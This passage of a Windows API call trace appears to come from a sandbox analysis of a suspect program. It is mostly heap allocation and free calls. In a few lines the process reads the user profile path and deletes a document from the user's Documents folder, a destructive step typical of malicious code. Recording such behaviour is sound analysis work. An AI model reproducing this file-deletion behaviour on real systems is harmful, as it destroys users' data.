(HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0268.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0268.528] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.528] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.528] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ac0 [0268.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0268.529] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0268.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0268.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.529] FreeLibrary (hLibModule=0x756e0000) returned 1 [0268.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0268.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0268.529] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0268.529] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0268.529] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.529] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0268.529] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0268.531] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0268.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0268.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0268.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0268.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51790 [0268.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0268.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51688 [0268.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0268.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0268.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0268.532] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.532] CloseHandle (hObject=0x2a0) returned 1 [0268.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0268.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.532] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0268.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0268.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0268.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0268.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0268.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0268.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0268.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0268.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0268.535] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0268.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0268.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e517f0 [0268.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51640 [0268.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51688 [0268.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0268.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51820 [0268.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0268.535] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.535] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0268.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0268.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0268.536] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.536] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.536] CloseHandle (hObject=0x2d0) returned 1 [0268.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0268.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.538] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be08a8 | out: hHeap=0x970000) returned 1 [0268.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0268.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0268.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516d0 | out: hHeap=0x970000) returned 1 [0268.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0268.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0268.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0268.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0268.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0268.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0268.539] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0268.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0268.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0268.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0268.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.539] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.539] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0268.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0268.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0268.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0268.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0268.540] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe50048 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51880 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51748 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0268.542] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51610 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0268.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0268.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0268.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0268.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0268.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0268.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0268.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0268.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0268.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0268.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0268.544] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0268.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0268.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0268.544] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0268.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0268.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0268.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0268.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0268.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0268.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0268.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0268.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0268.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0268.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0268.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0268.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0268.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0268.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0268.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0268.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0268.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0268.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0268.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5c) returned 0x2e558d8 [0268.545] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/ypyYdQHgVdPHUEe.odt", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\ypyYdQHgVdPHUEe.odt", lpFilePart=0x8cedf4*="ypyYdQHgVdPHUEe.odt") returned 0x2d [0268.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0268.545] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\ypyYdQHgVdPHUEe.odt" (normalized: "c:\\users\\fd1hvy\\documents\\ypyydqhgvdphuee.odt")) returned 0x20 [0268.545] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\ypyYdQHgVdPHUEe.odt", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1259e1c0, ftCreationTime.dwHighDateTime=0x1d5ed73, ftLastAccessTime.dwLowDateTime=0xfd20f8d0, ftLastAccessTime.dwHighDateTime=0x1d5e6a0, ftLastWriteTime.dwLowDateTime=0xfd20f8d0, ftLastWriteTime.dwHighDateTime=0x1d5e6a0, nFileSizeHigh=0x0, nFileSizeLow=0x119ea, dwReserved0=0x1, dwReserved1=0x1c, cFileName="ypyYdQHgVdPHUEe.odt", cAlternateFileName="YPYYDQ~1.ODT")) returned 0xa87090 [0268.545] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\ypyYdQHgVdPHUEe.odt" (normalized: "c:\\users\\fd1hvy\\documents\\ypyydqhgvdphuee.odt")) returned 1 [0268.557] FindNextFileW (in: hFindFile=0xa87090, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1259e1c0, ftCreationTime.dwHighDateTime=0x1d5ed73, ftLastAccessTime.dwLowDateTime=0xfd20f8d0, ftLastAccessTime.dwHighDateTime=0x1d5e6a0, ftLastWriteTime.dwLowDateTime=0xfd20f8d0, ftLastWriteTime.dwHighDateTime=0x1d5e6a0, nFileSizeHigh=0x0, nFileSizeLow=0x119ea, dwReserved0=0x1, dwReserved1=0x1c, cFileName="ypyYdQHgVdPHUEe.odt", cAlternateFileName="YPYYDQ~1.ODT")) returned 0 [0268.557] FindClose (in: hFindFile=0xa87090 | out: hFindFile=0xa87090) returned 1 [0268.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0268.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0268.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0268.557] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0268.557] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0268.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0268.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0268.557] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.558] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0268.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0268.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0268.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0268.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0268.558] RtlAllocateHeap 